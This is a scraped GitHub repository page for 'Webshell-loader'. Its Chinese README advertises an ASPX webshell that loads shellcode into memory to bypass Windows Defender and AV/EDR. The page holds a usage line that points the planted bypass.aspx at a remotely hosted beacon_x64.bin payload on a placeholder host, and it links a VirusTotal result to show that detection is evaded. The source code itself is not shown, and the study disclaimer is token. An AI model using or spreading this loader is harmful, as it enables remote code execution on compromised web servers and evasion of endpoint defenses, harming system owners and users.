Skip to content

ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)

Notifications You must be signed in to change notification settings

INotGreen/Webshell-loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 

Repository files navigation

说明

  • ASPX内存执行shellcode,绕过Windows Defender(AV/EDR),

  • 这只是个代码例子,目的是为了学习

  • 部分杀软(AV/EDR)可能需要你的Bin能够做到内存免杀

  • 持续更新中,包括后续的JSP内存加载

使用

将shellcode远程托管到任意网站(URLB)

http://URLA/bypass.aspx?shellcodeURL=http://URLB/beacon_x64.bin

视频(开头有点糊)

Rec_2023-12-14_0001.2.mp4

VT效果: https://www.virustotal.com/gui/file/b016e15e7cf0d737580474703cbf351eec956b870c2ad39e43beb3fa6422d5e3?nocache=1 image

About

ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published